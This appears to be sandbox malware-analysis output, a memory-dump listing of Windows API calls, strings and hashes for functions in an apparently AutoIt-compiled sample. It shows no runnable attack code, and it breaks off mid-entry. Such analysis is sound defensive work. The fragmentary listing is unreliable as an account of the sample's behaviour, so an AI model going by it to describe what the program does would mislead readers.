                                      • Part of subcall function 0099AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                      • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                      • Part of subcall function 0099AF83: BeginPath.GDI32(?), ref: 0099B009
                                      • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099B033
                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 009EEC20
                                    • LineTo.GDI32(00000000,00000003,?), ref: 009EEC34
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 009EEC42
                                    • LineTo.GDI32(00000000,00000000,?), ref: 009EEC52
                                    • EndPath.GDI32(00000000), ref: 009EEC62
                                    • StrokePath.GDI32(00000000), ref: 009EEC72
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: 023de4020d2552c22181356a16e9cfb5840b33f31c7feaad1a6eace75858176f
                                    • Instruction ID: 767d1ff1c6a222d5558e330057733e9547b96f15b0bddb0e3ab84dbd02fb30d2
                                    • Opcode Fuzzy Hash: 023de4020d2552c22181356a16e9cfb5840b33f31c7feaad1a6eace75858176f
                                    • Instruction Fuzzy Hash: 0011F77600014DBFEB02DFD4DD88EEA7F6DEB08354F048112BE0989160D7719D569BA0
                                    APIs
                                    • GetDC.USER32(00000000), ref: 009BE1C0
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 009BE1D1
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009BE1D8
                                    • ReleaseDC.USER32(00000000,00000000), ref: 009BE1E0
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 009BE1F7
                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 009BE209
                                      • Part of subcall function 009B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,009B9A05,00000000,00000000,?,009B9DDB), ref: 009BA53A
                                    Similarity
                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                    • String ID:
                                    • API String ID: 603618608-0
                                    • Opcode ID: acefa3d6fda0d003cd312fdad50e666cb1e1b0ecffcb8ec63057fe838a3e9d4b
                                    • Instruction ID: 3e70b19ad5083e6d0b8effd63eea69c7f6348c3dd7838c722914d00f980c4a07
                                    • Opcode Fuzzy Hash: acefa3d6fda0d003cd312fdad50e666cb1e1b0ecffcb8ec63057fe838a3e9d4b
                                    • Instruction Fuzzy Hash: 410184B5A00218BFEB109FE58C45B9EBFB8EB48351F004066EA04A7290D6719C02CBA0
                                    APIs
                                    • __init_pointers.LIBCMT ref: 009A7B47
                                      • Part of subcall function 009A123A: __initp_misc_winsig.LIBCMT ref: 009A125E
                                      • Part of subcall function 009A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009A7F51
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A7F65
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A7F78
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A7F8B
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A7F9E
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009A7FB1
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009A7FC4
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009A7FD7
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009A7FEA
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009A7FFD
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009A8010
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009A8023
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009A8036
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009A8049
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009A805C
                                      • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 009A806F
                                    • __mtinitlocks.LIBCMT ref: 009A7B4C
                                      • Part of subcall function 009A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00A3AC68,00000FA0,?,?,009A7B51,009A5E77,00A36C70,00000014), ref: 009A7E41
                                    • __mtterm.LIBCMT ref: 009A7B55
                                      • Part of subcall function 009A7BBD: RtlDeleteCriticalSection.KERNEL32(00000000,00000000,?,?,009A7B5A,009A5E77,00A36C70,00000014), ref: 009A7D3F
                                      • Part of subcall function 009A7BBD: _free.LIBCMT ref: 009A7D46
                                      • Part of subcall function 009A7BBD: RtlDeleteCriticalSection.KERNEL32(00A3AC68,?,?,009A7B5A,009A5E77,00A36C70,00000014), ref: 009A7D68
                                    • __calloc_crt.LIBCMT ref: 009A7B7A
                                    • GetCurrentThreadId.KERNEL32 ref: 009A7BA3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                    • String ID:
                                    • API String ID: 2942034483-0
                                    • Opcode ID: 052334b5687690b0acefb3f91b47649f9d1df8ee8890fc1a9409167f6f775c87
                                    • Instruction ID: 3a82c66229465dac0df031e3688129864ddead28aa6373a7eb7f6ccd6e48b50d
                                    • Opcode Fuzzy Hash: 052334b5687690b0acefb3f91b47649f9d1df8ee8890fc1a9409167f6f775c87
                                    • Instruction Fuzzy Hash: A4F0907210D3121AEA24B7F47C0BB4BA6989F83734F2406A9F8A0C90E2FF21884241F0
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0098281D
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00982825
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00982830
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0098283B
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00982843
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0098284B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: 0b4ed021063d0fb12ec438d03bb83eb09cf1510823c3f0f9c4401ec8e3ec074e
                                    • Instruction ID: 59504fd36e985c3d85a635ae475179588be1aeac95e671a0f049c2a122b4931f
                                    • Opcode Fuzzy Hash: 0b4ed021063d0fb12ec438d03bb83eb09cf1510823c3f0f9c4401ec8e3ec074e
                                    • Instruction Fuzzy Hash: 530167B1902B5EBDE3008FAA8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 1423608774-0
                                    • Opcode ID: bf2d27622c3f15a3478989ee61da448201170e45f9f55a46e735d3e0a6d65af7
                                    • Instruction ID: 89d8be5fa050388d401fe3f061f7ef9e8866237c3fe77547526d923f558c2dc1
                                    • Opcode Fuzzy Hash: bf2d27622c3f15a3478989ee61da448201170e45f9f55a46e735d3e0a6d65af7
                                    • Instruction Fuzzy Hash: 28018133902611ABD715ABD4ED4CFEB7769FF8C701B04042DF503920A4DB74A802DB51
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009C7C07
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009C7C1D
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 009C7C2C
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C3B
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C45
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C4C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 4cfa739cc5340220d447cc22334c52dc428bd90c83c525cf8c127bdb3b816cd6
                                    • Instruction ID: abaadf61be885949afd177d14e128f448fe7c899381ff99c00d21bd0f915057d
                                    • Opcode Fuzzy Hash: 4cfa739cc5340220d447cc22334c52dc428bd90c83c525cf8c127bdb3b816cd6
                                    • Instruction Fuzzy Hash: A4F01772641158BBE6219BD29C0EEEF7F7CEBC6B15F000118FA0192051EBA15A43D6B5
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,?), ref: 009C9A33
                                    • RtlEnterCriticalSection.KERNEL32(?,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A44
                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A51
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A5E
                                      • Part of subcall function 009C93D1: CloseHandle.KERNEL32(?,?,009C9A6B,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C93DB
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 009C9A71
                                    • RtlLeaveCriticalSection.KERNEL32(?,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: 2c34221f7f8cb96a86f67e6da3bce39b7d22e8772721ccc6dea8f0df364c9a70
                                    • Instruction ID: a74371c70ed6c94812ba7775ba051aae6d25ba4691ca28aae19d631dd3cfba3b
                                    • Opcode Fuzzy Hash: 2c34221f7f8cb96a86f67e6da3bce39b7d22e8772721ccc6dea8f0df364c9a70
                                    • Instruction Fuzzy Hash: 58F08233941215ABD7116BE4EC8DEEB7B39FF8C301B140425F603950A4DB759913DB51
                                    APIs
                                      • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
                                      • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
                                    • __swprintf.LIBCMT ref: 00981EA6
                                    Strings
                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00981D49
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                    • API String ID: 2125237772-557222456
                                    • Opcode ID: 5b70aef8c973ac0ba110d3baa90d65112fc60d92937b2fadc295701a6d94ce66
                                    • Instruction ID: 91b0a829080307cdf73867a625ebe56616cc4ba9e06b4444b95f351360c1af4b
                                    • Opcode Fuzzy Hash: 5b70aef8c973ac0ba110d3baa90d65112fc60d92937b2fadc295701a6d94ce66
                                    • Instruction Fuzzy Hash: DD914AB1508205AFC724FF24C995E6AB7A8AFD5700F04492DF996972A2DB30ED05CB92
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 009DB006
                                    • CharUpperBuffW.USER32(?,?), ref: 009DB115
                                    • VariantClear.OLEAUT32(?), ref: 009DB298
                                      • Part of subcall function 009C9DC5: VariantInit.OLEAUT32(00000000), ref: 009C9E05
                                      • Part of subcall function 009C9DC5: VariantCopy.OLEAUT32(?,?), ref: 009C9E0E
                                      • Part of subcall function 009C9DC5: VariantClear.OLEAUT32(?), ref: 009C9E1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4237274167-1221869570
                                    • Opcode ID: 2eea9c71765b6e70b7ba9b39c862e9018de76190680fb808f6e429204626a34e
                                    • Instruction ID: 4fcf2de2620dcc0465a852ffe84b569a4d27e10e09fd1da072f8e07db17c074f
                                    • Opcode Fuzzy Hash: 2eea9c71765b6e70b7ba9b39c862e9018de76190680fb808f6e429204626a34e
                                    • Instruction Fuzzy Hash: 05917C75648301DFCB10EF24C495A5AB7E8EFC8704F04886EF99A9B3A1DB31E945CB52
                                    APIs
                                      • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                    • _memset.LIBCMT ref: 009C5438
                                    • GetMenuItemInfoW.USER32(?), ref: 009C5467
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009C5513
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009C553D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                    • String ID: 0
                                    • API String ID: 4152858687-4108050209
                                    • Opcode ID: f01997063cd16e7a1bc9a825b1ddb2f437042f90fdc9ffe2820fa99c70989ab3
                                    • Instruction ID: 74eb3905ce055e16c37f555f9a70d2c41678ca2985afdb2e18c37eaac782f8a7
                                    • Opcode Fuzzy Hash: f01997063cd16e7a1bc9a825b1ddb2f437042f90fdc9ffe2820fa99c70989ab3
                                    • Instruction Fuzzy Hash: 36510072A087419BD7149B28C840F6BB7E8AF95360F050A2DF895D31A0DBA4EDC08B53
                                    APIs
                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009C027B
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009C02B1
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009C02C2
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009C0344
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: 9e144845c18be2090e6d73f1550017400e617c252076da584bdefab428e27c48
                                    • Instruction ID: 0a02c2f47a44bb8743e2616b5575c41f3dbda136be6081f1c6a5ce4c960eead6
                                    • Opcode Fuzzy Hash: 9e144845c18be2090e6d73f1550017400e617c252076da584bdefab428e27c48
                                    • Instruction Fuzzy Hash: B4417E72A04208EFDB05CF94C884F9A7BB9EF84310F1484ADED099F256D7B5D945CBA1
                                    APIs
                                    • _memset.LIBCMT ref: 009C5075
                                    • GetMenuItemInfoW.USER32 ref: 009C5091
                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009C50D7
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A41708,00000000), ref: 009C5120
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem_memset
                                    • String ID: 0
                                    • API String ID: 1173514356-4108050209
                                    • Opcode ID: f7a19c2f03de811391f0145221dbb993f716a712e8431407534f3d9634104e09
                                    • Instruction ID: da390705def5c80c32618c53f5097d149a817644fca3a3a5c972c21ad5b80e58
                                    • Opcode Fuzzy Hash: f7a19c2f03de811391f0145221dbb993f716a712e8431407534f3d9634104e09
                                    • Instruction Fuzzy Hash: ED41A071A087019FD720DF24D888F6ABBE8AFC5324F194A1EF89597291D730E940CB63
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 009E0587
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharLower
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 2358735015-567219261
                                    • Opcode ID: eab75251361c5822486c1145320790f0bd986f2499c591f406b8351722d5a0d8
                                    • Instruction ID: d50866a20d1f1ba40c34f0656c4867f81149a9fd0c27facd635c445e21583abd
                                    • Opcode Fuzzy Hash: eab75251361c5822486c1145320790f0bd986f2499c591f406b8351722d5a0d8
                                    • Instruction Fuzzy Hash: 2131D470500656AFCF00EF58C841AAEB3B8FF95314B108629F466A73D1DB71E955CB50
                                    APIs
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009BB88E
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009BB8A1
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 009BB8D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 10696648069e8dc0ccbe373004e760caa7c7375c0350f574394f83c20a7b063f
                                    • Instruction ID: c3852ba70a887ce04ef290cb3837ce9bdded209eb0ac39b98f9cec1c8aa9510a
                                    • Opcode Fuzzy Hash: 10696648069e8dc0ccbe373004e760caa7c7375c0350f574394f83c20a7b063f
                                    • Instruction Fuzzy Hash: 7021F3B6900108BFDB14ABB4D986EFE77BDEF85364F104529F021A72E1DBB44D069760
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D4401
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D4427
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009D4457
                                    • InternetCloseHandle.WININET(00000000), ref: 009D449E
                                      • Part of subcall function 009D5052: GetLastError.KERNEL32(?,?,009D43CC,00000000,00000000,00000001), ref: 009D5067
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 1951874230-3916222277
                                    • Opcode ID: f2b249215db9b9345804c7e6e4ad7f75e90cd64018bd61cedb60e422d6c0906f
                                    • Instruction ID: 2d1bae294b78ad341b04f7a5b4f274bc4f113eec7dfbe4fa142a34e8feb5dd27
                                    • Opcode Fuzzy Hash: f2b249215db9b9345804c7e6e4ad7f75e90cd64018bd61cedb60e422d6c0906f
                                    • Instruction Fuzzy Hash: 1D2180B2580208BFEB119F94CC85FBFB6ECEB88748F10C41BF109A2250DA748D469771
                                    APIs
                                      • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                      • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
                                      • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009E915C
                                    • LoadLibraryW.KERNEL32(?), ref: 009E9163
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009E9178
                                    • DestroyWindow.USER32(?), ref: 009E9180
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
